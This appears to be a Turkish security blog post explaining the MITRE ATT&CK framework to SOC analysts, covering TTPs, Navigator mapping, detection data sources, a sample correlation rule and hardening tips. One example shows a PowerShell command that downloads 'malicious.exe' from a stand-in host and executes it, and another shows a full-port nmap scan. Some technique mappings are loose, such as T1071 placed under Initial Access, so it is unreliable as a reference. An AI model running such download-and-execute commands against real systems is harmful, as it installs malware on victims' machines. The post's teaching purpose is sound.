CyberFlow Logo CyberFlow BLOG
Soc L2 Advanced Correlation Writing

MITRE ATT&CK Framework: Siber Güvenlik İçin Temel Bir Rehber

✍️ Ahmet BİRKAN 📂 Soc L2 Advanced Correlation Writing

MITRE ATT&CK Framework, siber güvenlik alanında kritik bir bilgi kaynağıdır. Bu yazıda, uygulama ve haritalama sürecini inceleyeceğiz.

MITRE ATT&CK Framework: Siber Güvenlik İçin Temel Bir Rehber

MITRE ATT&CK Framework, siber tehditlerin taktik, teknik ve prosedürlerini kapsayan geniş bir yapıdır. Bu blogda, ATT&CK aracılığıyla güvenlik açığınızı nasıl kapatabileceğinizi öğrenin.

Giriş ve Konumlandırma

MITRE ATT&CK Nedir?

Siber güvenlik alanında, MITRE ATT&CK Framework, saldırganların kullandığı taktik, teknik ve prosedürleri (TTP) sistematik bir biçimde sınıflandıran, dünya çapında kabul gören bir bilgi tabanıdır. MITRE ATT&CK, siber tehditlerin dinamik yapısını anlamak ve bu tehditlere karşı etkili yanıt stratejileri geliştirmek için kritik bir araçtır. Bu çerçeve, yalnızca saldırıların nasıl gerçekleştirildiğini anlamakla kalmaz, aynı zamanda organizasyonların kendi savunma yeteneklerini değerlendirmelerine de olanak tanır.

ATT&CK, organizasyonların siber saldırılara karşı korunma, tespit ve müdahale süreçlerini geliştirmek için bir rehber işlevi görür. Bu sistemin temelini, gerçek dünya gözlemlerine dayanarak oluşturulmuş taktik ve teknikler oluşturur. Saldırganların hangi yollarla hedeflerine ulaştığını anlamak, güvenlik stratejilerini etkili bir şekilde kurgulamaya yardımcı olur.

Neden Önemli?

Siber tehditler, organizasyonların kritik bilgilerini, altyapılarını ve itibarlarını hedef alırken, bu tür tehditleri anlamak ve bu tehditlere karşı bir strateji geliştirmek hayati önem taşır. MITRE ATT&CK, saldırıların nasıl ortaya çıktığını, saldırganların ne tür teknikler kullandığını ve bu tekniklerin nasıl geliştirildiğini analiz etmek için kapsamlı bir kaynak sunar. Bu bilgi, güvenlik ekiplerinin daha etkili tahminler yapmalarına ve olaylara müdahale süreçlerini optimize etmelerine yardımcı olur.

Siber güvenlik alanındaki uzmanlar için, MITRE ATT&CK'in sağlayacağı bilgiler, sadece tehditleri anlamalarının ötesinde, organizasyon içindeki güvenlik boşluklarını da belirlemelerine olanak tanır. Örneğin, bir saldırganın "Initial Access" (ilk erişim) aşamasındaki teknikleri ve "Lateral Movement" (yan hareket) için uyguladığı stratejiler, herhangi bir siber saldırı simülasyonu veya pentest çalışması için referans alınabilir.

Siber Güvenlik, Pentest ve Savunma Açısından Bağlamlandırma

MITRE ATT&CK çerçevesinin en büyük avantajlarından biri, bu bilgilerin siber güvenlik, penetrasyon testleri (pentest) ve savunma stratejileri açısından nasıl kullanılabileceği ile ilgilidir. Penetrasyon testleri, organizasyonların güvenlik zafiyetlerini belirlemek için gerçekleştirdikleri kontrollü testlerdir. MITRE ATT&CK kullanarak, pentesterlar hangi TTP’lerin test edilmeleri gerektiğini belirleyebilir ve bu saldırıların nasıl gerçekleştirileceğine dair bilgi sahibi olurlar.

Örneğin, bir pentester, red team (kırmızı takım) simülasyonları sırasında belirli bir teknik kullandığında, bu teknik ATT&CK matrisinde tanımlanan TTP’lere karşılık gelir. Aşağıda, bir örnek kod ile basit bir kaynağı görselleştirilmiş bir TTP tanımlaması sunulmuştur:

Taktik: Initial Access
Teknik: Phishing
Prosedür: 
- Kullanıcıdan bilgi toplamak için sahte bir e-posta gönderme.
- E-posta içindeki bağlantıya tıklanması sağlanarak kötü amaçlı yazılım yüklenmesi.

Bu tür bir yapının kullanılması, güvenlik ekiplerinin savunma stratejilerini belirlerken hangi alanlara odaklanmaları gerektiğini anlamalarına yardımcı olur. Ayrıca, güvenlik açıklarının kapatılmasında hangi tekniklerin hangi durumlarda kullanıldığını analiz edebilme yeteneği kazandırır.

Okuyucuyu Teknik İçeriğe Hazırlama

MITRE ATT&CK çerçevesinin bu şekilde yapılandırılması, okuyucunun teknik içeriği anlamasını ve uygulama kabiliyetini artırır. İlerleyen bölümlerde, ATT&CK'ün temel bileşenleri, her bir taktiğin ve tekniğin nasıl kullanılabileceği ve bu bilgilerin nasıl haritalandığı detaylı bir şekilde ele alınacaktır. Bu bağlamda, okuyucuların sadece saldırganların yöntemlerini değil, aynı zamanda kendi güvenlik uygulama süreçlerini de anlamaları teşvik edilir. Siber güvenlik, sürekli bir öğrenim ve adaptasyon gerektiren bir alan olduğundan, MITRE ATT&CK'in sağladığı bilgilerin etkin bir şekilde kullanılması, organizasyonlar için kritik bir zorunluluk haline gelmektedir.

Teknik Analiz ve Uygulama

MITRE ATT&CK Framework: Siber Güvenlik İçin Temel Bir Rehber

Teknik Analiz ve Uygulama

MITRE ATT&CK Framework, siber tehditler karşısında güçlü bir savunma oluşturmak için kritik bir araçtır. Bu bölümde, MITRE ATT&CK'in temel bileşenleri olan taktikler, teknikler ve prosedürler üzerinde durulacak ve uygulama örneklerine yer verilecektir. Temel olarak, ATT&CK Framework'ü kullanarak güvenlik analizi yapmanın nasıl gerçekleştirileceği ele alınacaktır.

Taktik, Teknik ve Prosedürlerin Anlaşılması

Sistemleri korumak için siber güvenlik uzmanları, saldırganların kullandığı taktikleri, teknikleri ve prosedürleri (TTP) anlamalıdır. Bu üç bileşen şu şekilde tanımlanabilir:

  • Taktik (Tactic): Saldırganın ulaştığı hedefi gösterir; yani operasyonel amacı temsil eder. Örnek olarak, bir saldırganın "Initial Access" amacıyla bir ağa giriş sağlaması.

  • Teknik (Technique): Taktikle belirlenen hedefe ulaşmak için kullanılan genel yöntemdir. Örneğin, phishing kullanılarak bir ağın ilk erişimi sağlanabilir.

  • Prosedür (Procedure): Belirli bir tekniği uygulamak için kullanılan spesifik adımlardır. Bu, belirli bir scrpt veya araç içerebilir.

Basit bir örnek ile daha iyi anlaşılmasını sağlamak için, aşağıda bu üç bileşeni bir arada kullanan bir senaryo sunulmaktadır:

# Saldırganın başlangıçta hedef ağa girmek için kullanabileceği bir PowerShell komutu
Invoke-WebRequest -Uri "http://example.com/malicious.exe" -OutFile "C:\malicious.exe"
Start-Process "C:\malicious.exe"

Bu örnekte:

  • Taktik: Initial Access
  • Teknik: Phishing
  • Prosedür: Malicious.exe dosyasının indirilmesi ve çalıştırılması.

MITRE ATT&CK Navigator Kullanımı

Siber güvenlik uzmanlarının taktik, teknik ve prosedürleri hızlı ve etkili bir şekilde görselleştirmesi için MITRE ATT&CK Navigator aracı oldukça kullanışlıdır. ATT&CK Navigator, kullanıcıların özel bir tehdit modeline göre haritalama yapmayı ve hangi alanlarda boşluklar olduğunu tespit etmeyi sağlar.

Kullanıcılar, Navigator aracılığıyla belirli bir tehdit aktörünü hedef alarak kendi ortalamalarını (coverage) görselleştirebilir. Örneğin, bir APT grubunun kullandığı teknikleri incelemek için aşağıdaki gibi bir haritalama yapılabilir:

Taktik: Initial Access
----------------------------------------
| Teknik (T1071)    | Prosedür A       |
| Teknik (T1133)    | Prosedür B       |
----------------------------------------

Bu haritalama sayesinde, analistler belirli bir teknik altında hangi prosedürlerin kullanıldığını görebilir ve bu alanlardaki güvenlik açıklarını analiz edebilir.

Veri Kaynaklarının Önemi

Bir TTP'yi başarıyla tespit etmek için doğru veri kaynaklarına sahip olmak kritik öneme sahiptir. MITRE ATT&CK, hangi tekniklerin hangi veri kaynaklarıyla tespit edilebileceğini belirler. Örneğin, bir "Credential Dumping" tekniği, sistem loglarının ve güvenlik olaylarının incelenmesini gerektirebilir.

Teknik: Credential Dumping
Veri Kaynakları:
- Windows Event Logs (Event ID: 4672)
- Sysmon Event (Event ID: 10)

Bu örnekte, "Credential Dumping" tekniğinin tespit edilebilmesi için gerekli veri kaynakları belirtilmiştir. Güvenlik ekipleri, bu tür bilgileri kullanarak hangi logları incelemeleri gerektiğini belirleyebilir.

Korelasyon Haritalama

Korelasyon kuralları oluşturmak, sistemlerin zayıf noktalarını belirlemek adına önemlidir. MITRE ATT&CK çerçevesinde bir teknik ve ona karşılık gelen prosedürleri eşleştirmek, olayların daha hızlı ve etkili bir şekilde tespit edilmesine olanak tanır.

Örneğin, bir güvenlik yöneticisi aşağıdaki gibi bir kural oluşturabilir:

alert:
  title: "Credential Dump Detected"
  condition: "if Windows Event ID 4672 is found and Sysmon Event ID 10 is found"
  action: "Trigger alert to SOC team"

Bu yapılandırma, iki farklı kaynaktan gelen verileri kullanarak bir Korelasyon kuralı oluşturur ve SOC ekibini haberdar eder.

Sonuç

MITRE ATT&CK Framework, siber güvenlik süreçlerini desteklemek için vazgeçilmez bir kaynaktır. Saldırganların taktik, teknik ve prosedürlerine dair kapsamlı bir anlayış geliştirerek, güvenlik ekipleri daha etkili bir savunma mekanizması oluşturabilir. Bu bölümde ele alınan araçlar ve yöntemler, bir organizasyonun siber güvenlik duruşunu güçlendirmek için kullanılabilir ve kritik bir katkı sağlar.

Risk, Yorumlama ve Savunma

Siber güvenlik alanında risk değerlendirmek, tehditlerin daha iyi anlaşılması ve savunma stratejilerinin geliştirilmesi açısından kritik öneme sahiptir. MITRE ATT&CK Framework, saldırganların kullandığı taktikleri, teknikleri ve prosedürleri (TTP) analiz ederek, bu süreçte önemli bir rehberlik sağlar. Bu bölümde, elde edilen bulguların güvenlik anlamını yorumlayacak, yanlış yapılandırma veya zafiyetlerin etkilerini ortaya koyacak, veri sızıntılarına ve servis tespitine dair sonuçları açıklayacak, profesyonel önlemlerle hardening önerileri sunacak ve sonuçları özetleyeceğiz.

Elde Edilen Bulguların Güvenlik Anlamı

Siber güvenlikte elde edilen bulgular, bir kurumun güvenlik durumunu değerlendirmek için kritik verilerdir. Örneğin, ağ üzerinde yapılan bir saldırı tespit edildiğinde, analiz edilmesi gereken birkaç önemli unsur vardır:

  1. Saldırının Doğası: Saldırganın hangi teknikleri kullandığı, saldırının hangi aşamalarında atak yaptığı.
  2. Zafiyet Noktaları: Saldırının hangi zafiyetlerden yararlanarak gerçekleştiği.
  3. Etki Alanı: Saldırının hangi sistemleri veya verileri etkilediği.

Bu unsurlar, yapılan risk değerlendirmelerin güvenliğini sağlamada önemli bir rol oynar.

Yanlış Yapılandırma veya Zafiyetlerin Etkisi

Yanlış yapılandırmalar ve sistem zafiyetleri, güvenlik açıklarına yol açarak siber saldırganların işini kolaylaştırır. Örneğin, gereksiz yere açık bırakılmış bir port, hem iç hem de dış tehditler için bir girdi sağlar. Bu tür zafiyetlerin etkileri şunlarla sınırlı değildir:

  • Veri İfşası: Hassas bilgilerin ele geçirilmesi.
  • Sistem Kontrolünün Ele Geçirilmesi: Saldırganların ağ içindeki sistemlere ulaşmasını sağlar.
  • İş Sürekliliği Sorunları: Yetkisiz erişim nedeniyle işletme süreçlerinde kesintilere neden olabilir.
# Güvenlilik testi için port durumu kontrolü komutu
nmap -p 1-65535 <IP_ADRESİ>

Bu komut, belirli bir IP adresindeki açık portları taramak için kullanılır. Potansiyel tehditleri tespit etmek için kullanılabilecek önemli bir araçtır.

Sızan Veri, Topoloji ve Servis Tespiti

Sızan veriler, bir saldırının sonuçları olarak ortaya çıkan önemli göstergelerdir. Örneğin, bir phishing saldırısının ardından kullanıcı kimlik bilgilerinin sızdırılması, sistemler arasındaki güvenliği doğrudan etkiler. Ayrıca, ağ topolojisi ve servis tespiti, siber savunma stratejilerinin belirlenmesinde temel girdilerdir.

  • Ağ Topolojisi Analizi: Saldırganların hangi yolları izleyerek sisteme girdiğini anlamak için ağ yapısının incelenmesi.
  • Servis Tespiti: Çalışan hizmetlerin ve uygulamaların sürekli izlenmesi, olası saldırı vektörlerini tanımlamak için kritik öneme sahiptir.

Profesyonel Önlemler ve Hardening Önerileri

Siber güvenliği artırmak için aşağıdaki önlemler uygulanmalıdır:

  1. Güçlü Şifre Politikaları: Zayıf şifrelerin kullanımını engellemek için karmaşık şifre standartlarının belirlenmesi.
  2. Düzenli Güncellemeler: Yazılım güncellemeleri ve yamaları, bilinen zafiyetlerin kapatılmasında etkili bir yöntemdir.
  3. Ağ Segmentasyonu: Kritik sistemlerin ayrılması, saldırganların erişimini zorlaştıracaktır.
  4. Eğitim Programları: Kullanıcı farkındalığını artırmak için düzenli olarak siber güvenlik eğitimleri verilmelidir.
# Örnek bir güvenlik kuralı konfigürasyonu
firewall:
  enabled: true
  rules:
    - action: allow
      sources:
        - <IP_ADRESİ>
      destination: secured_network

Yukarıda verilen YAML formatındaki yapılandırma örneği, belirli IP adreslerinden gelen trafiğin güvenli bir ağa erişimine izin verecek şekilde yapılandırılmıştır.

Sonuç Özeti

Risk değerlendirme ve yorumlama, siber güvenliğin sürekliliği açısından büyük öneme sahiptir. Yanlış yapılandırmalar ve zafiyetler, saldırganlara büyük avantajlar sağlarken, bu tehditlere karşı alınacak profesyonel önlemler ve hardening uygulamaları güvenliği artırıcı rol oynamaktadır. MITRE ATT&CK Framework, bu sürecin temellendirilmesinde değerli bir kaynak sunmakta ve organizasyonların savunma stratejilerini belirlemelerine yardımcı olmaktadır. Siber güvenlikte sürekli güncellenen bir yaklaşım benimsemek, riskleri minimizasyona yönelik kritik bir adımdır.